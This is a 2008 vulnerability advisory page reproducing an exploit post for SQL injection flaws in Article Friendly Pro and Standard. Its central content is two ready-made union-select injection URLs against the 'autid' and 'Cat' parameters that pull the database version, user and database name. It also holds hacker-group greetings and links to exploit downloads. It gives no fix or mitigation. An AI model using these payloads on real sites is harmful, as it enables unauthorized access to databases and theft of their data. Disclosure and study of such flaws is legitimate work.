Topic : | Article Friendly Pro/Standard (Cat) Remote SQL Injection Vulnerability
|
SecurityAlert : 4149
CVE : CVE-2008-3649 CVE : CVE-2008-3670 CWE : CWE-89
CWE : CWE-89
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : Mr.SQL
Published : 15.08.2008
Affected Software : | Articlefriendly, Article_friendly, Unknown, Unknown, Standard |
 Advisory Content : ###############################################################
#################### Viva IslaM Viva IslaM ####################
##
## Remote SQL Injection Vulnerability
##
## Article Friendly Pro ( categorydetail.php Cat )
##
## Article Friendly Standard ( authordetail.php autid )
##
## http://www.articlefriendly.com/
##
###############################################################
###############################################################
##
## AuTh0r : Mr.SQL
##
## H0ME : WwW.PaL-HaCkEr.CoM & WwW.AtsDp.CoM
##
## Email : SQL@Hotmail.it
##
## SYRIAN Arab HACkErS
########################
########################
##
##
## -[[: Exploites :]]-
##
## [[ Article Friendly Pro ]]
www.Target.com/authordetail.php?autid=-1'+union+select+0,0,0,CONCAT_WS(0x3a
,@@version,user(),datbase),0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*
##
## [[ Article Friendly Standard ]]
www.Target.com/categorydetail.php?Cat=1'+and+1=0+union+select+0,CONCAT_WS(0
x3a,@@version,user(),datbase),0,0,0,0,0,0/*
##
########################
########################
###########################################################################
############################
###########################################################################
############################
-(:: !Gr3E3E3E3E3E3E3TzZ! ::)-
:: HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMeD el 3rab :: ALwHeD ::
****** :: MuslimS HaCkErS ::
###########################################################################
############################
###########################################################################
############################
References :
http://securityreason.com/expldownload/1/4430/1 (Exploit)
http://www.milw0rm.com/exploits/6167
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|